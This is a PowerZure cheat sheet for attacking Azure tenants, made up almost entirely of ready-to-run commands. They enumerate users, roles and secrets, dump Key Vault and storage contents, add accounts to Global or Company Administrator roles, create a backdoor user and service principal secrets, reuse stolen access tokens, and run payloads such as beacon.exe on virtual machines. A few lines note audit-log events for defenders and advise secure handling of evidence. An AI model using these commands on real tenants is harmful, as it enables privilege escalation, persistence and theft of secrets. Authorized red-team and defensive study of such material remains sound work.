PowerZure

Connect:

Connect-AzAccount 
Get-AzureTarget

Enumeration:

https://powerzure.readthedocs.io/en/latest/Functions/infogathering.html

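Auto Enumeration:

The tee'd output files are engagement evidence. AzureKeyVaultContent.txt and AzureStorageContent.txt in particular can hold secrets in cleartext, so keep them on encrypted storage and purge them when the engagement closes.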

Get-AzureADApplication | tee AzureADApplication.txt
Get-AzureADAppOwner | tee AzureADAppOwner.txt
Get-AzureADDeviceOwner | tee AzureADDeviceOwner.txt
Get-AzureADRoleMember -Role 'Global Administrator' | tee AzureADRoleMember-GlobalAdmins.txt
Get-AzureADRoleMember -All | tee AzureADRoleMember-AllRoles.txt
Get-AzureADUser -All | tee AzureADUser-AllUsers.txt
Get-AzureInTuneScript | tee AzureInTuneScript.txt
Get-AzureLogicAppConnector | tee AzureLogicAppConnector.txt
Get-AzureManagedIdentity | tee AzureManagedIdentity.txt
Get-AzurePIMAssignment | tee AzurePIMAssignment.txt
Get-AzureRole -All | tee AzureRole-AllRoles.txt
Get-AzureRunAsAccount | tee AzureRunAsAccount.txt
Get-AzureSQLDB -All | tee AzureSQLDB-All.txt
Show-AzureKeyVaultContent -All | tee AzureKeyVaultContent.txt
Show-AzureStorageContent -All | tee AzureStorageContent.txt

Targeted Enumeration:

Get-AzureADGroupMember -Group '[Name of Group]' | tee AzureADGroupMember.txt
Get-AzureADUser -Username [Username] | tee AzureADUser.txt
Get-AzureRole -Role [ROLE] | tee AzureRole.txt
Get-AzureRolePermission -Permission [role definition] | tee AzureRolePermission.txt
Get-AzureADRoleMember -Role 'Global Administrator' | tee AzureADRoleMember.txt
Show-AzureKeyVaultContent -Name [VaultName] | tee AzureKeyVaultContent.txt
Show-AzureStorageContent -Name [StorageName] | tee AzureStorageContent.txt

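Exploit:

Most of the commands below change tenant or VM state rather than just reading it. Defender view: role, group, user, password and service-principal-secret changes are recorded in the Entra ID audit log (e.g. "Add member to role", "Add service principal credentials", "Reset user password"), and VM run-command execution appears in the Azure Activity Log as Microsoft.Compute/virtualMachines/runCommand/action. Record every change made so it can be rolled back and reported.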

https://powerzure.readthedocs.io/en/latest/Functions/operational.html

Add-AzureADGroupMember  -User [UPN] -Group [Group name]

Add-AzureADRole -Username [User Principal Name] -Role '[Role name]'
Add-AzureADRole -UserId [UserId] -RoleId '[Role Id]'
Add-AzureADRole -Username test@test.com -Role 'Company Administrator'
Add-AzureADRole -UserId 6eca6b85-7a3d-4fcf-b8da-c15a4380d286 -Role '4dda258a-4568-4579-abeb-07709e34e307'

Add-AzureADSPSecret -ApplicationName [ApplicationName name] -verbose 

New-AzureADUser -Username [User Principal Name] 

Set-AzureElevatedPrivileges

Set-AzureADUserPassword -Username [UPN] -Password [new password]

New-AzureBackdoor -Username [Username] -Password [Password]

Connect-AzureJWT -Token [access token] -AccountId [Account's ID]

Export-AzureKeyVaultContent -VaultName [Vault Name] -Type [Key or Certificate] -Name [Name of Key or Cert] -OutFilePath  [Full path of where to export]
Get-AzureKeyVaultContent -VaultName [Name of vault]

Get-AzureRunAsCertificate  -AutomationAccount [AA Name]

Get-AzureRunbookContent -Runbook [Name of Runbook] -OutFilePath [Path of where to export runbooks]
Get-AzureRunbookContent -All -OutFilePath 'C:\temp'
Start-AzureRunbook -Account [Automation Account name] -Runbook [Runbook name]

Invoke-AzureCommandRunbook -AutomationAccount [Automation Account name] -VMName [VM Name] -Command [command]
Invoke-AzureCommandRunbook -AutomationAccount [Automation Account name] -VMName [VM Name] -Script [Path to script]

Get-AzureStorageContent
Get-AzureStorageContent -StorageAccountName TestAcct -Type Container

Get-AzureVMDisk -DiskName [Name of Disk]

Invoke-AzureCommandRunbook -AutomationAccount [Automation Account name] -VMName [VM Name] -Script [Path to script]
Invoke-AzureCustomScriptExtension -VM 'Windows10' -ResourceGroup 'Defaultresourcegroup-cus' -Command 'powershell.exe -c mkdir C:\test'

Invoke-AzureRunCommand -VMName [VM Name] -Command [Command]
Invoke-AzureRunCommand -VMName AzureWin10 -Command whoami
Invoke-AzureRunCommand -VMName AzureWin10 -Script 'C:\temp\test.ps1'

Invoke-AzureRunMSBuild -VMName [Virtual Machine name] -File [C:/path/to/payload/onyourmachine.xml]
Invoke-AzVMRunCommand
Invoke-AzureRunMSBuild -VMName AzureWin10 -File 'C:\temp\build.xml'

Invoke-AzureRunProgram  -VMName [Virtual Machine name] -File [C:/path/to/payload.exe]
Invoke-AzureRunProgram -VMName AzureWin10 -File C:\temp\beacon.exe

Invoke-AzureVMUserDataAgent -VM [Virtual Machine name]

Invoke-AzureVMUserDataCommand -VM [Virtual Machine name] -Command [command]

New-AzureIntuneScript -Script [path/to/script.ps1]
